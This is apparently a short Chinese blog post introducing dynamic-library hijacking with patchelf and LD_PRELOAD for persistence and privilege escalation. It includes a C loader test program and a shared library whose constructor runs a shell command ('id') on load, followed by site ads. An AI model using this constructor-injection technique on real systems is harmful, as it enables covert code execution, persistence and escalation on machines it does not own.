patchelf劫持动态链接库实现权限维持和权限提升
前言:patch 动态链接库权限维持
参考文章:https://github.com/NixOS/patchelf
参考文章:https://xz.aliyun.com/t/13671
LD_PRELOAD
实验模拟
#include <dlfcn.h> #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { if (argc != 2) { fprintf(stderr, "Usage: %s <shared_library>\n", argv[0]); exit(EXIT_FAILURE); } // 尝试打开共享库,并使用 RTLD_LAZY 模式 void *handle = dlopen(argv[1], RTLD_LAZY); if (!handle) { fprintf(stderr, "Cannot load library: %s\n", dlerror()); exit(EXIT_FAILURE); } // 清除任何可能存在的错误信息 dlerror(); // 假设我们要调用的函数名为 'example_function' // 并且它的原型是 'void example_function(void);' typedef void (*example_function_t)(void); example_function_t func = (example_function_t)dlsym(handle, "example_function"); const char *dlsym_error = dlerror(); if (dlsym_error) { fprintf(stderr, "Cannot load symbol 'example_function': %s\n", dlsym_error); dlclose(handle); exit(EXIT_FAILURE); } // 调用函数 func(); // 关闭共享库 dlclose(handle); return 0; }
#include<stdlib.h> #include<stdio.h> #include<string.h> __attribute__ ((__constructor__)) void preload (void){ system("id");</font> }
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY